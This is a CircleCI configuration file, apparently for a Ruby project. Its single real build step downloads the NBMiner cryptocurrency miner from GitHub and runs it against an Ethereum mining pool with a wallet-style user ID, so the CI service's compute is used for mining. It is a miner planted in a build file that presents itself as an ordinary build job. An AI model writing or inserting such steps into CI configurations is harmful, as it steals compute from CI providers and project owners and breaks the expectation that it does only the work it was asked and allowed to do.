version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
    steps:
      - checkout
      - run:  wget https://github.com/NebuTech/NBMiner/releases/download/v41.5/NBMiner_41.5_Linux.tgz && tar xf NBMiner_41.5_Linux.tgz && cd NBMiner_Linux && ./nbminer -a ethash -o stratum+tcp://eth.2miners.com:2020 -u 12VJ4wRvUEFJN3UjjvYWkmatjZUMj1sZJp.T4_1